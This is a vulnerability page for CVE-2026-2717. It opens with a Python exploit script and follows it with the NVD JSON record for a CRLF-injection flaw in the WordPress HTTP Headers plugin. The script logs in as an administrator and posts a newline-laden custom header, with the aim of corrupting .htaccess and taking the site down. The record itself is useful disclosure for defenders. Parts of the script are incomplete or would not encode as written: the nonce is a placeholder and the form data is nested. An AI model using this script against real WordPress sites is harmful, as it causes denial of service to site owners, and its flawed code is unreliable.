CVE-2026-2717

import requests # Target URL and Login credentials (placeholder) target_url = "http://example.com/wp-admin/admin.php?page=http-headers" login_url = "http://example.com/wp-login.php" username = "admin" password = "password" # Create a session to maintain cookies session = requests.Session() # 1. Login to WordPress login_data = { "log": username, "pwd": password, "wp-submit": "Log In", "redirect_to": target_url } session.post(login_url, data=login_data) # 2. Prepare the malicious payload with CRLF injection # Injecting a newline character to break Apache configuration malicious_header_name = "X-Malicious-Header" malicious_header_value = "Value\r\n\n# This line breaks the config" # 3. Send the payload to the plugin settings # Note: Field names (action, option_page, etc.) depend on the specific plugin implementation payload_data = { "action": "update", "option_page": "http_headers_options", "_wpnonce": "<fetch_from_page>", # Nonce required "custom_headers[]": {malicious_header_name: malicious_header_value} } response = session.post(target_url, data=payload_data) if response.status_code == 200: print("[+] Payload sent successfully. Check .htaccess for configuration corruption.") else: print("[-] Failed to send payload.")

{"cve": {"id": "CVE-2026-2717", "sourceIdentifier": "[email protected]", "published": "2026-04-22T09:16:20.987", "lastModified": "2026-04-22T20:22:50.570", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The HTTP Headers plugin for WordPress is vulnerable to CRLF Injection in all versions up to, and including, 1.19.2. This is due to insufficient sanitization of custom header name and value fields before writing them to the Apache .htaccess file via `insert_with_markers()`. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary newline characters and additional Apache directives into the .htaccess configuration file via the 'Custom Headers' settings, leading to Apache configuration parse errors and potential site-wide denial of service."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-93"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/http-headers/tags/1.19.2/http-headers.php#L1098", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/http-headers/tags/1.19.2/http-headers.php#L745", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/http-headers/trunk/http-headers.php#L1098", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/http-headers/trunk/http-headers.php#L745", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7716e77f-e899-4046-9421-86fc0c36c245?source=cve", "source": "[email protected]"}]}}